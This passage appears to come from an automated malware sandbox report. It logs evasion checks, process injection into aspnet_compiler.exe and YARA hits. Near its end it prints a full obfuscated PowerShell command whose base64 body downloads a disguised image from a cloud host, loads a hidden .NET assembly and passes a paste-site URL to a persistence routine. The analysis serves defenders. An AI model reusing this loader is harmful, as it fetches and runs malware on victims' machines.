                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                        Malware Analysis System Evasion

                        barindex
                        Delayed program exit found
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 21_2_0040E54F Sleep,ExitProcess,21_2_0040E54F
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle,21_2_004198C2
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                        Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5483Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4372Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4172
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5631
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeAPI coverage: 5.1 %
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1484Thread sleep time: -13835058055282155s >= -30000sJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8052Thread sleep count: 4172 > 30
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8040Thread sleep count: 5631 > 30
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8084Thread sleep count: 37 > 30
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8084Thread sleep time: -34126476536362649s >= -30000s
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 21_2_0040B335 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,21_2_0040B335
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 21_2_0041B42F FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,FindClose,RemoveDirectoryW,GetLastError,FindClose,21_2_0041B42F
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 21_2_0040B53A FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,21_2_0040B53A
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 21_2_0044D5E9 FindFirstFileExA,21_2_0044D5E9
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 21_2_004089A9 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,__CxxThrowException@8,21_2_004089A9
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 21_2_00406AC2 FindFirstFileW,FindNextFileW,21_2_00406AC2
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 21_2_00407A8C __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,__CxxThrowException@8,21_2_00407A8C
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 21_2_00418C69 FindFirstFileW,FindNextFileW,FindNextFileW,21_2_00418C69
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 21_2_00408DA7 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,21_2_00408DA7
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 21_2_00406F06 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,21_2_00406F06
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: wscript.exe, 0000000E.00000003.2514594580.00000230DFFF8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                        Source: wscript.exe, 00000000.00000002.2177586636.0000014C48CE1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2175277697.0000014C48CE1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW/
                        Source: wscript.exe, 00000000.00000002.2177586636.0000014C48CE1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2175277697.0000014C48CE1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWp
                        Source: wscript.exe, 00000000.00000002.2177586636.0000014C48D2D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2174829728.0000014C48D2D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000E.00000002.2537637767.00000230DF731000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000E.00000003.2524802447.00000230DF6A1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000E.00000002.2537637767.00000230DF6A1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000E.00000003.2521837843.00000230DF731000.00000004.00000020.00020000.00000000.sdmp, aspnet_compiler.exe, 0000000F.00000002.2892055901.000000000102C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                        Source: wscript.exe, 0000000E.00000003.2524802447.00000230DF6A1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000E.00000002.2537637767.00000230DF6A1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWF
                        Source: aspnet_compiler.exe, 0000000F.00000002.2892055901.0000000000FB8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWh
                        Source: wscript.exe, 0000000E.00000003.2514594580.00000230DFFF8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\J
                        Source: aspnet_compiler.exe, 0000000F.00000002.2892055901.000000000102C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWGO
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 21_2_0043A65D IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,21_2_0043A65D
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 21_2_0041BCE3 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,21_2_0041BCE3
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 21_2_00442554 mov eax, dword ptr fs:[00000030h]21_2_00442554
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 21_2_0044E92E GetProcessHeap,21_2_0044E92E
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 21_2_00434168 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,21_2_00434168
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 21_2_0043A65D IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,21_2_0043A65D
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 21_2_00433B44 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,21_2_00433B44
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 21_2_00433CD7 SetUnhandledExceptionFilter,21_2_00433CD7

                        HIPS / PFW / Operating System Protection Evasion

                        barindex
                        System process connects to network (likely due to code injection or exploit)
                        Source: C:\Windows\System32\wscript.exeNetwork Connect: 45.63.94.214 443Jump to behavior
                        Yara detected Powershell decode and execute
                        Source: Yara matchFile source: amsi64_3704.amsi.csv, type: OTHER
                        Source: Yara matchFile source: amsi64_7972.amsi.csv, type: OTHER
                        Yara detected Powershell download and execute
                        Source: Yara matchFile source: amsi64_3704.amsi.csv, type: OTHER
                        Source: Yara matchFile source: amsi64_7972.amsi.csv, type: OTHER
                        Injects a PE file into a foreign processes
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 400000 value starts with: 4D5AJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 400000 value starts with: 4D5A
                        Writes to foreign memory regions
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 400000Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 401000Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 457000Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 470000Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 476000Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 47B000Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: C0F008Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 400000
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 401000
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 457000
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 470000
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 476000
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 47B000
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: DB6008
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: GetCurrentProcessId,OpenMutexA,CloseHandle,CreateThread,CloseHandle,Sleep,OpenProcess, svchost.exe21_2_00410F36
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 21_2_00418754 mouse_event,21_2_00418754
                        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $concessionaries = 'aWYgKCRudWxsIC1uZSAkUFNWZXJzaW9uVGFibGUgLWFuZCAkUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIC1uZSAkbnVsbCkgeyBbdm9pZF0kUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIH0gZWxzZSB7IFdyaXRlLU91dHB1dCAnUG93ZXJTaGVsbCB2ZXJzaW9uIE5vdCBhdmFpbGFibGUnIH07aWYgKCRudWxsIC1uZSAkUFNWZXJzaW9uVGFibGUgLWFuZCAkUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIC1uZSAkbnVsbCkgeyBbdm9pZF0kUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIH0gZWxzZSB7IFdyaXRlLU91dHB1dCAnUG93ZXJTaGVsbCB2ZXJzaW9uIE5vdCBhdmFpbGFibGUnIH07JHVubWF0ZXJuYWxseSA9ICdodHRwczovL3Jlcy5jbG91ZGluYXJ5LmNvbS9kenZhaTg2dWgvaW1hZ2UvdXBsb2FkL3YxNzM0MzE1MjQ0L20zZ3RicWt0dm5vY3l2bTQxMGFhLmpwZyc7JGJhZG1pbnRvbiA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7JHJvYWRtYWtlciA9ICRiYWRtaW50b24uRG93bmxvYWREYXRhKCR1bm1hdGVybmFsbHkpOyRQaXNjZXMgPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZygkcm9hZG1ha2VyKTskY2FwcmlmaWN1cyA9ICc8PEJBU0U2NF9TVEFSVD4+JzskYmlydGhlcnMgPSAnPDxCQVNFNjRfRU5EPj4nOyRkaXNwb3NlZGx5ID0gJFBpc2Nlcy5JbmRleE9mKCRjYXByaWZpY3VzKTskcGljdHVyZSA9ICRQaXNjZXMuSW5kZXhPZigkYmlydGhlcnMpOyRkaXNwb3NlZGx5IC1nZSAwIC1hbmQgJHBpY3R1cmUgLWd0ICRkaXNwb3NlZGx5OyRkaXNwb3NlZGx5ICs9ICRjYXByaWZpY3VzLkxlbmd0aDskYmVlZnN0ZWFrID0gJHBpY3R1cmUgLSAkZGlzcG9zZWRseTskcmV0YXBpbmcgPSAkUGlzY2VzLlN1YnN0cmluZygkZGlzcG9zZWRseSwgJGJlZWZzdGVhayk7JGRpcmVjdGlvbnMgPSAtam9pbiAoJHJldGFwaW5nLlRvQ2hhckFycmF5KCkgfCBGb3JFYWNoLU9iamVjdCB7ICRfIH0pWy0xLi4tKCRyZXRhcGluZy5MZW5ndGgpXTskYmVpbGQgPSBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKCRkaXJlY3Rpb25zKTskbG93ZXJjYXNlZCA9IFtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV06OkxvYWQoJGJlaWxkKTskcm9vbWlseSA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoJ1ZBSScpOyRyb29taWx5Lkludm9rZSgkbnVsbCwgQCgnMC9QWHJVSS9yL2VlLmV0c2FwLy86c3B0dGgnLCAnbXVkd2VlZCcsICdtdWR3ZWVkJywgJ211ZHdlZWQnLCAnYXNwbmV0X2NvbXBpbGVyJywgJ211ZHdlZWQnLCdtdWR3ZWVkJywnbXVkd2VlZCcsJ2hhZW1hdGFjaG9tZXRlcicsICdDOlxQcm9ncmFtRGF0YVwnLCdoYWVtYXRhY2hvbWV0ZXInLCd2YnMnLCcxJywnMScsJ1Rhc2tOYW1lJykpO2lmICgkbnVsbCAtbmUgJFBTVmVyc2lvblRhYmxlIC1hbmQgJFBTVmVyc2lvblRhYmxlLlBTVmVyc2lvbiAtbmUgJG51bGwpIHsgW3ZvaWRdJFBTVmVyc2lvblRhYmxlLlBTVmVyc2lvbiB9IGVsc2UgeyBXcml0ZS1PdXRwdXQgJ1Bvd2VyU2hlbGwgdmVyc2lvbiBOb3QgYXZhaWxhYmxlJyB9O2lmICgkbnVsbCAtbmUgJFBTVmVyc2lvblRhYmxlIC1hbmQgJFBTVmVyc2lvblRhYmxlLlBTVmVyc2lvbiAtbmUgJG51bGwpIHsgW3ZvaWRdJFBTVmVyc2lvblRhYmxlLlBTVmVyc2lvbiB9IGVsc2UgeyBXcml0ZS1PdXRwdXQgJ1Bvd2VyU2hlbGwgdmVyc2lvbiBOb3QgYXZhaWxhYmxlJyB9Ow==';$neurologically = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($concessionaries));Invoke-Expression $neurologicallyJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C copy *.vbs "C:\ProgramData\haematachometer.vbs"Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"Jump to behavior
